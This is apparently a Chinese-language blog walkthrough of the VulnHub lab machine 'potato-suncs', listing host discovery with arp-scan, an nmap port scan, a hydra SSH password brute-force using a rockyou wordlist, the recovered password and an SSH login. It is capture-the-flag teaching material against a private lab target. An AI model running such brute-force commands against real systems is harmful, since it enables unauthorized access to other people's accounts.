VulnHub—potato-suncs

使用命令扫描靶机ip

arp-scan -l

尝试访问一下ip

发现一个大土豆没什么用

尝试扫描一下子域名

没有发现什么有用的信息

尝试扫描端口

namp -A 192.168.19.137 -p-

尝试访问一下端口,发现都访问不进去

查看源代码发现了网页的标题 potato,就想着爆破一下密码

hydra -l potato -P '/home/kali/桌面/rockyou-part1(1-25000).txt' ssh://192.168.19.137 -s 7120

爆破结果是密码为"letmein"

ssh potato@192.168.16.137 -p 7120

尝试登录一下ssh

相关推荐
憧憬成为web高手16 小时前
[0CTF 2016]piapiapia 脚本和总结
web安全·网络安全
Whoami!16 小时前
03-【高校】多校区链路加解密架构
网络安全·架构·链路加解密
C2H5OH1 天前
PortSwigger SQL注入LAB11
网络安全
学习3人组1 天前
Cisco ASA防火墙 NAT实验:源NAT+目的NAT(Trust/Untrust双区域,无DMZ)
网络·网络安全
菩提小狗1 天前
每日安全情报报告 · 2026-06-03
网络安全·漏洞·cve·安全情报·每日安全
quan_泉1 天前
好靶场_初学者训练营_OWASP_TOP10
网络安全
MageGojo1 天前
IP归属地查询API实战指南:快速获取IP地址定位、运营商与风险信息
网络安全·openapi·ip定位·ip查询api·ip归属地接口
郑洁文2 天前
基于CNN的异常流量监测系统的设计与实现
人工智能·神经网络·网络安全·cnn
txg6662 天前
WildSync:通过Wild API 使用恢复实现自动化 Fuzzing Harness 合成
运维·深度学习·网络安全·自动化
郑洁文2 天前
基于Python的Web命令执行漏洞自动化检测系统
前端·python·网络安全·自动化